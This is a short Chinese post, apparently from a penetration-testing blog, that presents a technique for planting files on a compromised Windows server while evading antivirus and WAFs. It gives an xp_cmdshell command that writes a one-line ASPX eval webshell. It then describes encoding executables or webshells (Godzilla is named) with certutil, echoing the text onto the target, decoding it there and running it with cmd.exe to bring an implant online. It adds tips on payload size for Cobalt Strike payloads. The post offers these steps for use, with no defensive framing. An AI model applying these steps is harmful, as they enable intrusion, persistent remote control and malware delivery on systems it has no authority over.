分享 | 文件上传的一个骚操作(低权限+bypassAV)

0x02 正文

其中包括杀软或某狗、某盾

此时下载文件的各种命令均被拦截

bitsadmin：

certutil证书：

还会被杀软报警

powershell也会被彻底封杀

尤其是某管家，拦截更彻底，根本没有倒计时自动消失（此时需要夸一下某大厂的报警提示倒计时功能）

而在这种环境下可在有权限写入的前提下尝试写入一句话木马

xp_cmdshell 'echo  ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["bmfx"], "unsafe");%^>> D:\WWW\bmfx.aspx'

但也存在被某狗、WAF杀掉的可能，此时，骚操作上场

windows自带的证书下载，也就是上文使用但远程下载被拦截的Certutil，还可用来对文件编码解码

本地：Certutil -encode artifact.exe artifact.txt
或指定路径：Certutil -encode d:artifact.exe d:artifact.txt

将txt文本使用echo命令

echo sfAFASFAsfasgasdf………>>d:1.txt

写入服务器后，进入txt所在目录执行解码（或直接指定物理目录文件）

Certutil -decode art.txt art.exe或：Certutil -decode d:art.txt d:art.exe

后续可在命令中执行exe上线

cmd.exe /c art.exe

重点是：本地解码编码操作不会触发杀软拦截行为！

此外，Certutil支持将任意文件编码解码，除了exe还有aspx、php、jsp等（如加密免杀的webshell，此处使用哥斯拉为例）

可在web站点写入文件后访问txt查看写入有无偏差

还有一点，本人亲测，编码后txt中的文本类似于生成的shellcode，会自动换行显示，但本地替换换行符、自行拆分换行符，不改变内容的前提下，编码、解码前后的文件不会有任何影响。

但是在navicat等数据库软件里操作的话还有一个限制，echo的长度会提示不要过长

此时就要看各位师傅们在bypass WaF、AV时如何减小体量了，一般cs的马bypass后会在50k左右，使用sqlmap的—os-shell执行echo不会像navicat要求128字符那么短，但也有长度限制，具体各位可亲测。